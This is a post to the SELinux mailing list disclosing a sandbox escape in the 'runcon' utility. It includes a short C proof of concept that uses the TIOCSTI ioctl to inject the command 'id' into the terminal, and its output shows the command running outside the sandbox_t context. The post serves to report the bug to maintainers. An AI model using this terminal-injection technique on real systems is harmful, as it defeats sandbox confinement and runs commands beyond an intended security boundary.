Quoting "Stephen Smalley" <sds@xxxxxxxxxxxxx>:
Thank you for the bug report. This bug is now fixed in upstream commit
acca96a135a4d2a028ba9b636886af99c0915379.
Cool, thanks. Though it'll lose job control, that's why most 'su-like'
programs refuse to patch this and are still vulnerable.
Anyways, the same happens with the 'runcon' utility:
$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
int main()
{
char *cmd = "id\n";
while(*cmd)
ioctl(0, TIOCSTI, cmd++);
execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o test
$ runcon -t sandbox_t ./test
id
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Should it be also patched there?
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
_______________________________________________
Selinux mailing list
Selinux@xxxxxxxxxxxxx
To unsubscribe, send email to Selinux-leave@xxxxxxxxxxxxx.
To get help, send an email containing "help" to Selinux-request@xxxxxxxxxxxxx.
